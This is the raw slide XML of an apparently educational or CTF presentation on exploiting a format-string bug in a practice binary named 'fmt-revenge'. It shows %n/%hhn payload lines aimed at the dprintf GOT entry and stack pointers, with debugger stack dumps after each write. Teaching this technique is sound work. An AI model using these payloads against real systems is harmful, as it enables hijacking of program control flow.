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7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27"/>
    <p:restoredTop sz="94673"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="2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34D01297-63D9-564D-8D8F-1B983EF7E3F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60D1594-E9D1-1D44-AB2C-18B63B9C7CA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F4515-B403-F84B-BEF5-E508265619EB}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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206DB5A-A81B-814E-B76A-DC90ACAD59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8810077-132D-8F42-A324-9A4380C9A94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F8BB1-D2AD-3A4F-A35A-63BEEAC6E7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00279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8CB9D7-6E7B-9344-9165-FE585104F826}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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79824-5180-6A4E-B0D4-088F907E880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53872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F31DC7-0406-0A4D-B5C7-E2F9597AD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D076881-96CC-4C46-A999-CD6EE738C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BE9CC2-4799-514A-807F-C12C85422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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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543595-2D49-B740-B72A-87A16BA36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E77C61-EDA0-D44B-8409-901F62AA4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82A48-7DFC-CB45-9C05-1E7247942AD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19116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FE71DE-3071-8243-A6D3-BC36F0391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803BDA6-4548-7147-A3BA-339386762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37AA79-89F2-BA49-8261-4611A73E2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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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30E3DE-A315-EE4D-8A15-6A397755C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24E678-869E-2040-9437-9A1754263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82A48-7DFC-CB45-9C05-1E7247942AD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00032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BA8420B-FB86-F946-AA08-9B93EDDAE9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5CBB768-38D9-FD46-BFE6-0732B5460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82F13E-4D6D-7247-A189-EE49E8E74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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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2B18BC-4BBE-2241-B6EC-AD55BA62D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123B3E-6A5B-2A49-A221-DD81298AA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82A48-7DFC-CB45-9C05-1E7247942AD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25378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F94417-49FD-F944-983A-52DD72B19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690E7F-2EFB-DE4D-B9AA-9BCB64127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7C2CCD-D4B5-9746-9D01-32A4DC186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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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616BF7-D684-C341-906E-A244E2F20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4E9CC9-6DE4-0441-8D80-1A652E8DA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82A48-7DFC-CB45-9C05-1E7247942AD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5510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FFBBCE-80B4-E844-BEDD-309A6C5E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C0F616C-CC3D-A74F-B975-57C3FC68E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B5E117-0506-704B-828B-A8B1C059D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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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18E724-6189-3247-8AA7-3655CA486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4AC8DF-03EA-2D46-B61C-F6CA999DC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82A48-7DFC-CB45-9C05-1E7247942AD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5775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B4994E-05D1-8544-B91F-88CD9588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8BAAB7-1772-F447-AA81-CCC90953FA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2988258-69D6-DD41-A538-517EBB7D2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628E37B-26D9-B54B-B96E-17DEC4967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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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6BDAD2F-31C7-3A49-8224-66D6FCDD7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BF578EC-0168-774E-B387-11AA5B396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82A48-7DFC-CB45-9C05-1E7247942AD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83143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D5BC29-A26A-824F-92D6-8B0710365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0D2D69C-22C6-8841-9BF0-2828EE657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66D3468-F31A-9E4F-A59E-098E86253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1BED153-3B71-254B-9D07-216549F87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540563F-E780-E44F-9EE4-1220C5013F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429784A-EA47-A74B-AEC0-9B633C182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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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2A70AAB-467B-594E-8712-CE1DC443C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D96BC5A-FD4C-DD41-A667-35FE3C59B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82A48-7DFC-CB45-9C05-1E7247942AD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7644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9594CF-9BA9-C946-93F5-1D7D4A946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AC83FDB-03B2-0244-BE97-15C12241C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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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F78968C-4C4E-464E-BBD6-C8566C5E9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3BED71D-BBEB-BC46-A9F6-A8AF42656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82A48-7DFC-CB45-9C05-1E7247942AD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88329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0F48B04-83A9-3844-9BF5-E846174E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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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9308737-7AAD-E34F-973B-A23824630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24764A-AF6D-4F47-AFF2-798D81B5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82A48-7DFC-CB45-9C05-1E7247942AD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92709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6D9491-9525-7645-88F7-B07DA8FFD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26A58B-7D7A-634B-AB33-00E016D32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EBCC6F6-04A5-8940-B54A-4B1D99B5C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FE31E19-264E-6942-8F9E-028E703E0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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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9529D76-74A4-FA45-A83A-50E1F76A8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5D25D51-726B-D145-B963-91D0B3D1C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82A48-7DFC-CB45-9C05-1E7247942AD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40805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2FF2A6-6461-4A4D-8052-896BE404A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D248A23-E4F0-8A40-80BE-CE268C5F41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D566B1B-0624-284B-9171-704A1C3E5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F0458E7-F727-5C43-9149-3A2B3CF61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401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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4C39C5A-C7F0-CB4F-AF65-E6B6E968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4FEB334-C760-2048-B1DC-2673CA95A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82A48-7DFC-CB45-9C05-1E7247942AD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7195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13DB2E2-86F0-E048-B02A-DCB63D723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AA499D5-FE20-9248-9A51-5008CC05D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4CD288-7AEB-3A4E-B993-8C6B9A67A1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1401F-73FA-3748-8CF2-9185CB91B1F4}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/26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70C147-93AA-824B-A84E-5E446B0F3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FE9FA6-E2A9-CE44-8C59-A79C97E4C4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82A48-7DFC-CB45-9C05-1E7247942AD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510846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194483-1288-C244-BD60-9D2E7102FB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err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-revenge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82562C7-13E0-2143-9C84-223D666FA6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/>
              <a:t>Ubuntu18.04.1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5661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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%7$n'.format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>elf.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>']))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; 0x7ffeb488bd70 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;:    sub    rsp,0xd8) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; 0x7ffeb488bd70 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;:      sub    rsp,0xd8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd70</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;: sub    rsp,0xd8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| 0x7ffeb488bd78 --&gt; 0x7fa066ef8b97 (&lt;__libc_start_main+231&gt;:       mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>edi,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>)                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge") </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254748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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%5$hhn'.format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd78 --&gt; 0x7fa066ef8b97 (&lt;__libc_start_main+231&gt;: mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd78 --&gt; 0x7fa066ef8b97 (&lt;__libc_start_main+231&gt;:    mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| 0x7ffeb488bd70 --&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;: sub    rsp,0xd8)                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> --&gt; 0x7fa066ef8b97 (&lt;__libc_start_main+231&gt;:       mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>edi,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>)                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge")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AD44AA3-2D9D-48E2-A119-D39030BBC09A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2645545" y="716418"/>
            <a:ext cx="224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p = 0x7ffeb488bd78</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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960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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%7$hn'.format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elf.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']+2 &amp; 0xffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; 0x7ffeb488bd78 --&gt; 0x7fa066ef101a --&gt; 0x7d18000000000008     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; 0x7ffeb488bd78 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7fa066ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>101a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x7d18000000000008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| 0x7ffeb488bd70 --&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;: sub    rsp,0xd8)                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| 0x7ffeb488bd78 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7fa066ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>101a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x7d18000000000008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge") </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4135590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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%5$hhn'.format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p+2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd7a --&gt; 0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
